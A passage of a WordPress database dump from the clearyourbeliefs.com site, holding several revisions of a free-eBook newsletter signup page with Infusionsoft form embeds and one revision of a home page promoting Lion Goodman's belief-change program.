src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>\r\n\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:41:05', '2014-12-04 21:41:05', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1909, 2, '2014-12-04 16:42:30', '2014-12-04 21:42:30', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="alignleft size-medium wp-image-1893" /></a><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:42:30', '2014-12-04 21:42:30', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1913, 2, '2014-12-04 16:45:42', '2014-12-04 21:45:42', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="ebook" width="1" height="1" class="aligncenter size-thumbnail wp-image-1475" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:45:42', '2014-12-04 21:45:42', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1910, 2, '2014-12-04 16:43:01', '2014-12-04 21:43:01', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="aligncenter size-medium wp-image-1893" /></a><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:43:01', '2014-12-04 21:43:01', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1911, 2, '2014-12-04 16:43:34', '2014-12-04 21:43:34', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="aligncenter size-medium wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:43:34', '2014-12-04 21:43:34', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1912, 2, '2014-12-04 16:44:24', '2014-12-04 21:44:24', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-150x150.png" alt="Clear-your-beliefs-ebook" width="150" height="150" class="aligncenter size-thumbnail wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:44:24', '2014-12-04 21:44:24', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1914, 2, '2014-12-04 16:46:28', '2014-12-04 21:46:28', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="aligncenter size-medium wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:46:28', '2014-12-04 21:46:28', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1915, 2, '2014-12-04 16:47:33', '2014-12-04 21:47:33', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 100%; margin: 30px auto;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="alignleft size-medium wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:47:33', '2014-12-04 21:47:33', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1918, 2, '2014-12-04 16:52:07', '2014-12-04 21:52:07', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:52:07', '2014-12-04 21:52:07', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1916, 2, '2014-12-04 16:48:39', '2014-12-04 21:48:39', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="201" height="300" class="alignright size-medium wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:48:39', '2014-12-04 21:48:39', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1917, 2, '2014-12-04 16:50:02', '2014-12-04 21:50:02', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\nWe would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="aligncenter size-medium wp-image-1893" /></a><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:50:02', '2014-12-04 21:50:02', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1920, 2, '2014-12-04 16:55:16', '2014-12-04 21:55:16', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:55:16', '2014-12-04 21:55:16', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1919, 2, '2014-12-04 16:54:50', '2014-12-04 21:54:50', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\nYou will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.\r\n\r\nIf we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n<em><small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</em></small>\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></center></div>\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-12-04 16:54:50', '2014-12-04 21:54:50', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1933, 2, '2014-12-04 17:21:04', '2014-12-04 22:21:04', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 10px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-04 17:21:04', '2014-12-04 22:21:04', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
